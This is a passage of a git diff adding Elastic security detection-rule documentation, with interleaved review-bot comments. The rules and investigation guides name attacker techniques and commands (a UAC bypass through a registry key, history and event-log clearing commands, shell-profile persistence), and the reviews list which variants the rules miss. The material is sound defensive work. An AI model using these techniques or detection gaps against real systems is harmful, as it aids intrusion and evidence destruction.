@@ -0,0 +1,80 @@ +[[prebuilt-rule-8-10-5-bash-shell-profile-modification]] +=== Bash Shell Profile Modification + +Both ~/.bash_profile and ~/.bashrc are files containing shell commands that are run when Bash is invoked. These files are executed in a user's context, either interactively or non-interactively, when a user logs in so that their environment is set correctly. Adversaries may abuse this to establish persistence by executing malicious content triggered by a user’s shell. + +*Rule type*: query + +*Rule indices*: + +* logs-endpoint.events.* +* auditbeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Defend + +*Version*: 104 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:file and event.type:change and + process.name:(* and not (sudo or vim or zsh or env or nano or bash or Terminal or xpcproxy or login or cat or cp or + launchctl or java or dnf or tailwatchd or ldconfig or yum or semodule or cpanellogd or dockerd or authselect or chmod or + dnf-automatic or git or dpkg or platform-python)) and + not process.executable:(/Applications/* or /private/var/folders/* or /usr/local/* or /opt/saltstack/salt/bin/*) and + file.path:(/private/etc/rc.local or + /etc/rc.local or + /home/*/.profile or + /home/*/.profile1 or + /home/*/.bash_profile or + /home/*/.bash_profile1 or + /home/*/.bashrc or + /Users/*/.bash_profile or + /Users/*/.zshenv) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: 
+** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Unix Shell Configuration Modification +** ID: T1546.004 +** Reference URL: https://attack.mitre.org/techniques/T1546/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-binary-executed-from-shared-memory-directory.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-binary-executed-from-shared-memory-directory.asciidoc new file mode 100644 index 0000000000..313f3eabb7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-binary-executed-from-shared-memory-directory.asciidoc 
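Review bot: (Bash Shell Profile Modification) the `file.path` list covers `/home/*` and `/Users/*` only, so root's own `/root/.bashrc` and `/root/.bash_profile`, the most valuable targets for the persistence described, are not monitored; on macOS, where zsh is the default shell, `/Users/*/.zshrc` and `.zprofile` are missing while only `.zshenv` is listed, and `/Users/*/.bashrc` is absent although `/home/*/.bashrc` is present. The entries `/home/*/.profile1` and `/home/*/.bash_profile1` read like typos of the un-suffixed names; if they are intentional, a comment saying what writes them is needed. Finally, the `process.name` exclusion removes `bash`, `zsh` and `cat`, so the common `echo '...' >> ~/.bashrc` or heredoc pattern, where the writing process is the shell itself, produces no alert; that limitation should at least be stated in the description, which currently only mentions `~/.bash_profile` and `~/.bashrc` while the query also watches `/etc/rc.local`, `.profile` and `.zshenv`.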
@@ -0,0 +1,69 @@ +[[prebuilt-rule-8-10-5-binary-executed-from-shared-memory-directory]] +=== Binary Executed from Shared Memory Directory + +Identifies the execution of a binary by root in Linux shared memory directories: (/dev/shm/, /run/shm/, /var/run/, /var/lock/). This activity is to be considered highly abnormal and should be investigated. Threat actors have placed executables used for persistence on high-uptime servers in these directories as system backdoors. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://linuxsecurity.com/features/fileless-malware-on-linux +* https://twitter.com/GossiTheDog/status/1522964028284411907 +* https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Threat: BPFDoor +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action in ("exec", "exec_event") and +process.executable : ("/dev/shm/*", "/run/shm/*", "/var/run/*", "/var/lock/*") and +not process.executable : ("/var/run/docker/*", "/var/run/utsns/*", "/var/run/s6/*", "/var/run/cloudera-scm-agent/*") and +user.id == "0" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ 
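Review bot: (Binary Executed from Shared Memory Directory) the description groups `/var/run/` and `/var/lock/` under "shared memory directories", but they are runtime and lock directories and on current distributions are symlinks to `/run` and `/run/lock`; the query matches `process.executable : "/var/run/*"` and `"/var/lock/*"` but has no `/run/lock/*` or plain `/run/` counterpart, so if the sensor reports the resolved executable path those two patterns never match. Confirm which form `process.executable` carries for a binary launched through the symlink and either add the `/run/...` equivalents or reword the description to "tmpfs-backed runtime directories".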
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bpf-filter-applied-using-tc.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bpf-filter-applied-using-tc.asciidoc new file mode 100644 index 0000000000..6706969717 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bpf-filter-applied-using-tc.asciidoc 
@@ -0,0 +1,69 @@ +[[prebuilt-rule-8-10-5-bpf-filter-applied-using-tc]] +=== BPF filter applied using TC + +Detects when the tc (transmission control) binary is utilized to set a BPF (Berkeley Packet Filter) on a network interface. Tc is used to configure Traffic Control in the Linux kernel. It can shape, schedule, police and drop traffic. A threat actor can utilize tc to set a bpf filter on an interface for the purpose of manipulating the incoming traffic. This technique is not at all common and should indicate abnormal, suspicious or malicious activity. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/h3xduck/TripleCross/blob/master/src/helpers/deployer.sh +* https://man7.org/linux/man-pages/man8/tc.8.html + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Threat: TripleCross +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type != "end" and process.executable : "/usr/sbin/tc" and process.args : "filter" and process.args : "add" and process.args : "bpf" and not process.parent.executable: "/usr/sbin/libvirtd" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** 
Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bypass-uac-via-event-viewer.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bypass-uac-via-event-viewer.asciidoc new file mode 100644 index 0000000000..3bdb54c001 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bypass-uac-via-event-viewer.asciidoc 
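Review bot: (BPF filter applied using TC) the description expands tc as "transmission control"; tc is the traffic control utility, as the next sentence and the tc.8 reference say, so fix the expansion. In the query, `process.executable : "/usr/sbin/tc"` ties detection to one install path, so a tc at `/sbin/tc` (systems without a merged /usr) or a copied or renamed binary is not matched; keying on `process.name == "tc"` together with the `filter`, `add` and `bpf` arguments is more robust. The ATT&CK mapping to Execution / Unix Shell (T1059.004) also does not describe attaching a BPF program with tc; Defense Evasion or Command and Control would fit the TripleCross reference better.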
@@ -0,0 +1,147 @@ +[[prebuilt-rule-8-10-5-bypass-uac-via-event-viewer]] +=== Bypass UAC via Event Viewer + +Identifies User Account Control (UAC) bypass via eventvwr.exe. Attackers bypass UAC to stealthily execute code with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Bypass UAC via Event Viewer + +Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted. + +For more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works). + +During startup, `eventvwr.exe` checks the registry value of the `HKCU\Software\Classes\mscfile\shell\open\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. 
If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Inspect the host for suspicious or abnormal behavior in the alert timeframe. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. 
+ - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. 
+ - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "eventvwr.exe" and + not process.executable : + ("?:\\Windows\\SysWOW64\\mmc.exe", + "?:\\Windows\\System32\\mmc.exe", + "?:\\Windows\\SysWOW64\\WerFault.exe", + "?:\\Windows\\System32\\WerFault.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation 
Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-chkconfig-service-add.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-chkconfig-service-add.asciidoc new file mode 100644 index 0000000000..95555c89f4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-chkconfig-service-add.asciidoc 
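Review bot: (Bypass UAC via Event Viewer) the investigation steps tell the analyst to look for 4624 logons "after the registry modification", but the rule only sees the child process spawned by `eventvwr.exe`, and the guide names the key involved (`HKCU\Software\Classes\mscfile\shell\open\command`) without saying how to retrieve it; add a step to pull Elastic Defend registry events for that key so the timeline anchor the later steps rely on actually exists. The query also keys on `process.parent.name : "eventvwr.exe"` alone, so any binary renamed to eventvwr.exe will trip it; either constrain `process.parent.executable` to `?:\\Windows\\System32\\` and `SysWOW64\\` or note in the false positive section that such hits are masquerading rather than a UAC bypass.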
@@ -0,0 +1,72 @@ +[[prebuilt-rule-8-10-5-chkconfig-service-add]] +=== Chkconfig Service Add + +Detects the use of the chkconfig binary to manually add a service for management by chkconfig. Threat actors may utilize this technique to maintain persistence on a system. When a new service is added, chkconfig ensures that the service has either a start or a kill entry in every runlevel and when the system is rebooted the service file added will run providing long-term persistence. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Threat: Lightning Framework +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and +( + (process.executable : "/usr/sbin/chkconfig" and process.args : "--add") or + (process.args : "*chkconfig" and process.args : "--add") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Initialization Scripts +** ID: T1037 +** Reference URL: https://attack.mitre.org/techniques/T1037/ +* Sub-technique: +** Name: RC Scripts +** ID: T1037.004 +** Reference URL: https://attack.mitre.org/techniques/T1037/004/ 
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-clearing-windows-console-history.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-clearing-windows-console-history.asciidoc new file mode 100644 index 0000000000..ce3fa32db9 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-clearing-windows-console-history.asciidoc 
@@ -0,0 +1,126 @@ +[[prebuilt-rule-8-10-5-clearing-windows-console-history]] +=== Clearing Windows Console History + +Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://stefanos.cloud/kb/how-to-clear-the-powershell-command-history/ +* https://www.shellhacks.com/clear-history-powershell/ +* https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Clearing Windows Console History + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code. + +Attackers can try to cover their tracks by clearing PowerShell console history. PowerShell has two different ways of logging commands: the built-in history and the command history managed by the PSReadLine module. This rule looks for the execution of commands that can clear the built-in PowerShell logs or delete the `ConsoleHost_history.txt` file. 
+ +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. + - Verify if any other anti-forensics behaviors were observed. +- Investigate the PowerShell logs on the SIEM to determine if there was suspicious behavior that an attacker may be trying to cover up. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + - Ensure that PowerShell auditing policies and log collection are in place to grant future visibility. 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") or process.pe.original_file_name == "PowerShell.EXE") and + (process.args : "*Clear-History*" or + (process.args : ("*Remove-Item*", "rm") and process.args : ("*ConsoleHost_history.txt*", "*(Get-PSReadlineOption).HistorySavePath*")) or + (process.args : "*Set-PSReadlineOption*" and process.args : "*SaveNothing*")) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: Clear Command History +** ID: T1070.003 +** Reference URL: https://attack.mitre.org/techniques/T1070/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-clearing-windows-event-logs.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-clearing-windows-event-logs.asciidoc new file mode 100644 index 0000000000..9ebbf117d6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-clearing-windows-event-logs.asciidoc 
@@ -0,0 +1,120 @@ +[[prebuilt-rule-8-10-5-clearing-windows-event-logs]] +=== Clearing Windows Event Logs + +Identifies attempts to clear or disable Windows event log stores using Windows wevetutil command. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Clearing Windows Event Logs + +Windows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries can tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response. + +This rule looks for the execution of the `wevtutil.exe` utility or the `Clear-EventLog` cmdlet to clear event logs. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. 
+- Investigate other alerts associated with the user/host during the past 48 hours. + - Verify if any other anti-forensics behaviors were observed. +- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up. + +### False positive analysis + +- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for this action. +- Analyze whether the cleared event log is pertinent to security and general monitoring. Administrators can clear non-relevant event logs using this mechanism. If this activity is expected and noisy in your environment, consider adding exceptions — preferably with a combination of user and command line conditions. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. + - This activity is potentially done after the adversary achieves its objectives on the host. Ensure that previous actions, if any, are investigated accordingly with their response playbooks. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and +( + ( + (process.name : "wevtutil.exe" or process.pe.original_file_name == "wevtutil.exe") and + process.args : ("/e:false", "cl", "clear-log") + ) or + ( + process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and + process.args : "Clear-EventLog" + ) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: Clear Windows Event Logs +** ID: T1070.001 +** Reference URL: https://attack.mitre.org/techniques/T1070/001/ +* Sub-technique: +** Name: Disable Windows Event Logging +** ID: T1562.002 +** Reference URL: https://attack.mitre.org/techniques/T1562/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-cobalt-strike-command-and-control-beacon.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-cobalt-strike-command-and-control-beacon.asciidoc new file mode 100644 index 0000000000..25d89cecca --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-cobalt-strike-command-and-control-beacon.asciidoc 
@@ -0,0 +1,84 @@ +[[prebuilt-rule-8-10-5-cobalt-strike-command-and-control-beacon]] +=== Cobalt Strike Command and Control Beacon + +Cobalt Strike is a threat emulation platform commonly modified and used by adversaries to conduct network attack and exploitation campaigns. This rule detects a network activity algorithm leveraged by Cobalt Strike implant beacons for command and control. + +*Rule type*: query + +*Rule indices*: + +* packetbeat-* +* auditbeat-* +* filebeat-* +* logs-network_traffic.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.morphisec.com/fin7-attacks-restaurant-industry +* https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html +* https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack + +*Tags*: + +* Use Case: Threat Detection +* Tactic: Command and Control +* Domain: Endpoint + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Threat intel + +This activity has been observed in FIN7 campaigns. 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +((event.category: (network OR network_traffic) AND type: (tls OR http)) + OR event.dataset: (network_traffic.tls OR network_traffic.http) +) AND destination.domain:/[a-z]{3}.stage.[0-9]{8}\..*/ + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-code-signing-policy-modification-through-registry.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-code-signing-policy-modification-through-registry.asciidoc new file mode 100644 index 0000000000..7d8edc9c6e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-code-signing-policy-modification-through-registry.asciidoc 
@@ -0,0 +1,132 @@ +[[prebuilt-rule-8-10-5-code-signing-policy-modification-through-registry]] +=== Code Signing Policy Modification Through Registry + +Identifies attempts to disable/modify the code signing policy through the registry. Code signing provides authenticity on a program, and grants the user with the ability to check whether the program has been tampered with. By allowing the execution of unsigned or self-signed code, threat actors can craft and execute malicious code. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Code Signing Policy Modification Through Registry + +Microsoft created the Windows Driver 